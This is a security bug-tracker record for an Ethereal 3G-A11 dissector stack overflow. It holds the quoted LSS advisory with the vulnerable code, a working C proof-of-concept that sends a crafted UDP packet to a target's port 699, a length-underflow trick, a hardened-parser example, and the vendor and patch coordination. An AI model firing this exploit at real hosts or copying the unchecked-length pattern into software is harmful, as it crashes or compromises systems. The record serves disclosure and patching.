Bugzilla – Bug 71777
VUL-0: CVE-2005-0739: ethereal buffer overflow
Last modified: 2021-10-27 08:46:45 UTC
We received the following report via bugtraq. The issue is public.

Date: Tue, 8 Mar 2005 02:16:24 +0100
From: LSS Security <exposed@lss.hr>
To: bugtraq@securityfocus.com
Subject: Ethereal remote buffer overflow
User-Agent: Mutt/1.5.6i
X-Spam-Level:

LSS Security Advisory #LSS-2005-03-04
http://security.lss.hr

---

Title              : Ethereal remote buffer overflow
Advisory ID        : LSS-2005-03-04
Date               : 08.03.2005
Advisory URL       : http://security.lss.hr/en/index.php?page=exp
Impact             : Stack overflow and possible code execution
Risk level         : High
Vulnerability type : Remote
Vendors contacted  : Yes

---

===[ Overview

Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product. Its open source license allows talented experts in the networking community to add enhancements. It runs on all popular computing platforms, including Unix, Linux, and Windows.

===[ Vulnerability

There is a remote buffer overflow vulnerability in the Ethereal dissector for CDMA2000 A11 packets. The vulnerability is located in the dissect_a11_radius() function in packet-3g-a11.c, used for RADIUS authentication dissection. The number of bytes that will be copied from the packet to a buffer on the stack is taken from the packet itself. 16 bytes are reserved for that buffer, and the string length can be up to 256 bytes (unsigned char), so it is possible to overflow local variables and the return address.

packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
  size_t radius_len;
...
  guchar str_val[MAX_STRVAL];
...
  radius_len = tvb_get_guint8(tvb, offset + 1);
...
  strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2);
...
}
----------------

A similar vulnerability was also found in the same function a few lines below, where RADIUS attributes are copied to the stack.
packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
  guint attribute_len;
...
  guchar str_val[MAX_STRVAL];
...
  attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
...
  case ATTR_TYPE_STR:
    strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2), attribute_len - 2);
...
}
----------------

===[ Affected versions

All versions after the 3G-A11 dissector was added to CVS, including the latest 0.10.9. The vulnerability was tested with the latest Ethereal on Linux and Windows.

===[ Fix

It seems that they have fixed that vulnerability just a few days ago, and a new version will probably be available soon from http://www.ethereal.com.

===[ PoC Exploit

Exploit is in attachment, and URL http://security.lss.hr/en/PoC/

===[ Credits

Credits for this vulnerability go to Leon Juranic.

===[ LSS Security Contact

LSS Security Team, <eXposed by LSS>
WWW    : http://security.lss.hr
E-mail : security@LSS.hr
Tel    : +385 1 6129 775

/*
 *
 * Ethereal 3G-A11 remote buffer overflow PoC exploit
 * --------------------------------------------------
 * Coded by Leon Juranic <ljuranic@lss.hr>
 * LSS Security <http://security.lss.hr/en/>
 *
 */

#include <stdio.h>
#include <string.h>          /* memset(), strncpy() */
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int
main (int argc, char **argv)
{
        int sock;
        struct sockaddr_in sin;
        unsigned char buf[1024];
        char bla[200];

        if (argc < 2) {
                fprintf(stderr, "usage: %s <target ip>\n", argv[0]);
                return 1;
        }

        /* one UDP datagram to port 699, the port the 3G-A11 dissector registers */
        sock=socket(AF_INET,SOCK_DGRAM,0);
        sin.sin_family=AF_INET;
        sin.sin_addr.s_addr = inet_addr(argv[1]);
        sin.sin_port = htons(699);

        /* A11 header bytes, then the extension carrying the RADIUS-style attribute */
        buf[0] = 22;
        memset(buf+1,'A',19);
        buf[20] = 38;
        *(unsigned short*)&buf[22] = htons(100);
        *(unsigned short*)&buf[28] = 0x0101;
        buf[30] = 31;
        buf[31] = 150; // len for overflow...play with this value if it doesn't work

        /* attribute value: the 'B's that strncpy() copies into the 16-byte str_val[] */
        memset (bla,'B',200);
        strncpy ((char *)buf+32,bla,180);
        sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
        return 0;
}
Additional information from vendor-sec:

Date: Tue, 08 Mar 2005 13:27:08 -0600
From: Gerald Combs <gerald@ethereal.com>
To: vendor-sec@lst.de
Subject: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three vulnerabilities
User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206)
X-Spam-Level:

Ethereal 0.10.10 is scheduled to be released on Thursday, March 10. It addresses the following security issues:

The Etheric dissector was susceptible to a buffer overflow.
Versions affected: 0.10.7 to 0.10.9
Fixed in revision: 13176

The GPRS-LLC dissector could crash if the "ignore cipher bit" option was enabled.
Versions affected: 0.10.7 to 0.10.9
Fixed in revisions: 13386 (further improvements in 13549 and 13571)

The 3GPP2 A11 dissector was susceptible to a buffer overflow.
Versions affected: 0.10.3 to 0.10.9
Fixed in revision: 13574

Ethereal's SVN repository can be browsed online at http://anonsvn.ethereal.com/viewcvs/viewcvs.py/
Information on obtaining the source code can be found at http://www.ethereal.com/development.html#source

ETA on the official release of 0.10.10 is Thursday, March at 3:00 PM CST (21:00 UTC). Notification will be made via the ethereal-announce mailing list and the web site (http://www.ethereal.com).

Please don't hesitate to contact me if you have any questions.
Changed version to final
Date: Wed, 9 Mar 2005 08:59:39 -0500
From: Josh Bressers <bressers@redhat.com>

> The 3GPP2 A11 dissector was susceptible to a buffer overflow.
> Versions affected: 0.10.3 to 0.10.9
> Fixed in revision: 13574

This issue has been noticed and is CAN-2005-0699. I'll mail Steve about the other two since they're basically public.
Date: Wed, 9 Mar 2005 16:56:22 -0500
From: Josh Bressers <bressers@redhat.com>
To: Gerald Combs <gerald@ethereal.com>
Cc: vendor-sec@lst.de
Subject: Re: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three vulnerabilities

On Tue, Mar 08, 2005 at 01:27:08PM -0600, Gerald Combs wrote:
> Ethereal 0.10.10 is scheduled to be released on Thursday, March 10. It
> addresses the following security issues:
>
> The Etheric dissector was susceptible to a buffer overflow.
> Versions affected: 0.10.7 to 0.10.9
> Fixed in revision: 13176

This issue is CAN-2005-0704

>
> The GPRS-LLC dissector could crash if the "ignore cipher bit" option
> was enabled.
> Versions affected: 0.10.7 to 0.10.9
> Fixed in revisions: 13386 (further improvements in 13549 and 13571)

This issue is CAN-2005-0705

>
> The 3GPP2 A11 dissector was susceptible to a buffer overflow.
> Versions affected: 0.10.3 to 0.10.9
> Fixed in revision: 13574

This issue is CAN-2005-0699

--
JB
Date: Wed, 9 Mar 2005 02:33:58 +0100
From: LSS Security <exposed@lss.hr>
To: bugtraq@securityfocus.com
Subject: RE: Ethereal remote buffer overflow - addon

Just a little trick to overflow more stack memory in Ethereal. It is possible to overflow the stack with more than 255 - 2 bytes. If radius_len is set to 1, in the strncpy() line it is subtracted by two and it will be -1 (0xffffffff -> 4294967295 (unsigned long)).

packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
  size_t radius_len;
...
  guchar str_val[MAX_STRVAL];
...
  radius_len = tvb_get_guint8(tvb, offset + 1);
...
  strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2);
...
}
----------------

------------------------------------------
Leon Juranic, LSS Security
http://security.lss.hr
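The two length bugs quoted above (the 16-byte str_val[] overflow in the first advisory and the radius_len = 1 wrap-around in this addon), as an added example that is not part of the advisory or of Ethereal's code: the length handling of dissect_a11_radius() reduced to a stand-alone type/length/value parser, with a hardened version next to it. The simplified attribute layout, the status codes, the helper names and the constructed packets are this example's own assumptions. It also checks that the length byte does not exceed the captured bytes, which goes beyond what the advisory discusses (in Ethereal that range check is done by tvb_get_ptr(), not by the dissector). The vulnerable function returns the count the old code would have handed to strncpy() instead of performing the copy, so the example runs without smashing its own stack.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_STRVAL 16

/* Verdicts of the hardened parser (this example's own codes, not Ethereal's). */
enum a11_status {
    A11_OK = 0,
    A11_LEN_UNDERFLOW,   /* length byte < 2: len - 2 wraps to SIZE_MAX */
    A11_VALUE_TOO_LONG,  /* value would not fit in str_val[MAX_STRVAL] */
    A11_TRUNCATED        /* length byte claims more bytes than the packet holds */
};

/* Vulnerable pattern as quoted in the advisory: the count handed to strncpy()
 * is the packet's own length byte minus two.  Returns that count instead of
 * copying into a 16-byte stack array, so it is safe to run. */
size_t a11_vuln_copy_len(const uint8_t *pkt, size_t offset)
{
    size_t radius_len = pkt[offset + 1];   /* tvb_get_guint8(tvb, offset + 1) */
    return radius_len - 2;                 /* size_t: 150 - 2 == 148, 1 - 2 == SIZE_MAX */
}

/* Hardened pattern: every value derived from the packet is validated before it
 * is used as an offset or copy length, and the destination keeps room for the
 * terminating NUL that strncpy() silently drops when the buffer is full. */
enum a11_status a11_safe_get_str(const uint8_t *pkt, size_t pkt_len, size_t offset,
                                 char str_val[MAX_STRVAL], size_t *out_len)
{
    size_t radius_len;

    if (pkt_len < 2 || offset > pkt_len - 2)
        return A11_TRUNCATED;              /* type and length bytes must both exist */
    radius_len = pkt[offset + 1];
    if (radius_len < 2)
        return A11_LEN_UNDERFLOW;          /* the length covers its own 2-byte header */
    if (radius_len > pkt_len - offset)
        return A11_TRUNCATED;              /* value would run past the captured bytes */
    if (radius_len - 2 > MAX_STRVAL - 1)
        return A11_VALUE_TOO_LONG;         /* reject rather than truncate silently */

    memcpy(str_val, pkt + offset + 2, radius_len - 2);
    str_val[radius_len - 2] = '\0';
    *out_len = radius_len - 2;
    return A11_OK;
}

/* Build one constructed attribute: type byte, the length byte the caller asks
 * for, then value_bytes of 'B'.  Length byte and real size are deliberately
 * independent; that mismatch is what the dissector never checked.
 * Returns the number of bytes written, or 0 if buf is too small. */
size_t a11_build_attr(uint8_t *buf, size_t buf_len, uint8_t len_byte, size_t value_bytes)
{
    if (buf_len < 2 + value_bytes)
        return 0;
    buf[0] = 31;             /* attribute type byte, the value the PoC sends */
    buf[1] = len_byte;
    memset(buf + 2, 'B', value_bytes);
    return 2 + value_bytes;
}

/* What the vulnerable code would hand to strncpy() for such an attribute. */
size_t a11_vuln_len_for(uint8_t len_byte, size_t value_bytes)
{
    uint8_t pkt[300];
    if (a11_build_attr(pkt, sizeof pkt, len_byte, value_bytes) == 0)
        return 0;
    return a11_vuln_copy_len(pkt, 0);
}

/* The hardened parser's verdict for the same attribute. */
enum a11_status a11_safe_status_for(uint8_t len_byte, size_t value_bytes)
{
    uint8_t pkt[300];
    char str_val[MAX_STRVAL];
    size_t n = 0;
    size_t pkt_len = a11_build_attr(pkt, sizeof pkt, len_byte, value_bytes);
    return a11_safe_get_str(pkt, pkt_len, 0, str_val, &n);
}

int main(void)
{
    static const char *verdict[] = { "OK", "LEN_UNDERFLOW", "VALUE_TOO_LONG", "TRUNCATED" };
    static const struct { uint8_t len_byte; size_t value_bytes; const char *what; } cases[] = {
        {   7,   5, "well-formed 5-byte string"            },
        { 150, 148, "PoC length byte 150, 148 bytes of 'B'" },
        {   1,   0, "length byte 1 (the addon's trick)"     },
        {  10,   3, "claims 8 value bytes, only 3 present"  },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-40s old strncpy count: %20zu   hardened: %s\n", cases[i].what,
               a11_vuln_len_for(cases[i].len_byte, cases[i].value_bytes),
               verdict[a11_safe_status_for(cases[i].len_byte, cases[i].value_bytes)]);
    return 0;
}
```

Compile with cc -std=c99 -Wall and run it with no arguments. The 150 and 1 cases reproduce the advisory's 148-byte copy and the wrapped length (SIZE_MAX, which is the addon's 4294967295 on a 32-bit build); the hardened parser rejects both before any copy, and rejects a short packet that the old code would have read past. Rejecting an oversized value rather than truncating it to 15 bytes is a deliberate choice: a dissector that silently shortens attacker-controlled fields hides exactly the malformed traffic an analyst wants to see.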
Just in case we need to mention it in any advisory:

Date: Tue, 8 Mar 2005 23:35:01 -0300
From: Diego Giagio <dgiagio@irion.com.br>
To: bugtraq@securityfocus.com
Cc: Gerald Combs <gerald@ethereal.com>
Subject: Re: Ethereal remote buffer overflow

> ---
>
> Title              : Ethereal remote buffer overflow
> Advisory ID        : LSS-2005-03-04
> Date               : 08.03.2005
> Advisory URL       : http://security.lss.hr/en/index.php?page=exp
> Impact             : Stack overflow and possible code execution
> Risk level         : High
> Vulnerability type : Remote
> Vendors contacted  : Yes
>
> ---

This vulnerability was first discovered by me, on 01/Mar/2005. The vendor was immediately contacted, as you can see below:

http://marc.theaimsgroup.com/?l=ethereal-dev&m=110973103628823&w=2
http://marc.theaimsgroup.com/?l=ethereal-dev&m=110973731214683&w=2

This vulnerability wouldn't be made public until the next Ethereal version comes out (hopefully 10 or 11 this month), as I dealt with the vendor. A proof-of-concept remote root exploit was made by me, but will only be publicized on schedule.

Diego Giagio
Date: Thu, 10 Mar 2005 20:14:37 -0600
From: Gerald Combs <gerald@ethereal.com>
To: Josh Bressers <bressers@redhat.com>
Cc: vendor-sec@lst.de
Subject: Re: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three vulnerabilities

Josh Bressers wrote:
> On Tue, Mar 08, 2005 at 01:27:08PM -0600, Gerald Combs wrote:
>
>> Ethereal 0.10.10 is scheduled to be released on Thursday, March 10. It
>> addresses the following security issues:
> ...

Thanks. Unfortunately, we have one more issue:

The IAPP dissector is vulnerable to a buffer overflow.
Versions affected: 0.9.1 to 0.9.9
Fixed in revision: 13707

The release has been postponed to tomorrow (March 11) at 11:00 AM CST (17:00 GMT).
From: Martin Schulze <joey@infodrom.org>

Sune Kloppenborg Jeppesen wrote:
> Any CVE id for the latest issue?
>
> On Friday 11 March 2005 03:14, Gerald Combs wrote:
> > Thanks. Unfortunately, we have one more issue:
> >
> > The IAPP dissector is vulnerable to a buffer overflow.
> > Versions affected: 0.9.1 to 0.9.9
> > Fixed in revision: 13707

Please use CAN-2005-0739

Regards,

	Joey
From: Gerald Combs <gerald@ethereal.com>

That was a typo. It should be 0.9.1 to 0.10.9.

Sune Kloppenborg Jeppesen wrote:
> Seems like the affected version is wrong here and on the CVE entry.
Created attachment 31679
ethereal-3g-a11.c sample exploit. Be careful, might contain backdoors.
swampid 622
http://www.ethereal.com/appnotes/enpa-sa-00018.html mentions additional non-security bugs that could make ethereal crash.
ping
Sorry, SLES9-SP2 has higher priority. For all that I try backporting patches from stable, but it consumes a lot of time, because the version in older distros is too different ;(.
I think if it is too hard to backport we can also get a waiver to do a version upgrade of ethereal.
Fixed security bugs in 3GPP2 A11, IAPP, sFlow dissectors (CAN-2005-0699, CAN-2005-0739) and submitted for sles8, 8.2, 9.0, 9.1, sles9 and 9.2
/work/src/done/PATCHINFO/ethereal.patch.box /work/src/done/PATCHINFO/ethereal.patch.maintained
packages released
CVE-2005-0739: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)